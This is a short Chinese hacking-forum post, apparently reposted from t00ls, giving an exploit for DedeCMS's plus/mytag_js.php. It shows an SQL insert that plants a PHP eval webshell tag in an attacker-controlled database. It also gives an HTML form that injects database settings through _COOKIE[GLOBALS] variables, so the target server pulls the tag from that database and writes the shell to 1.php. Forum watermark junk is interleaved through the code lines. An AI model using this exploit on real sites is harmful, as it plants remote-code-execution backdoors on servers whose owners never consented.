轉自:t00ls
網上流傳的漏洞exp都是說要知道後台才能利用,但不用,只要 plus 目錄存在,伺服器能外連,就能拿shell
_1 U- t( B- F8 c
前題條件,必須準備好自己的dede資料庫,然後插入資料:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
- 低調求發展2 I' ` y- o! p/ ?
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />T00LS p; A- k8 j1 T' U
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> - 低調求發展" ?( p, h4 `+ O3 Y0 y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />T00LS' D. E7 d' ]) I; |% B% V5 ^% o
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> - 低調求發展6 J1 `7 R/ h- `# x
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />www.t00ls.net0 |4 W% t; ~' H! U9 E p
<input type="text" value="true" name="nocache" style="width:400">www.t00ls.net" }1 h9 H- {+ k S# {2 i) ]8 Z
<input type="submit" value="提交" name="QuickSearchBtn"><br />www.t00ls.net8 Y- } @# x' I% o" p5 j5 R0 P
</form>
<script>
function addaction()
{$ h3 `0 t5 i6 w
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>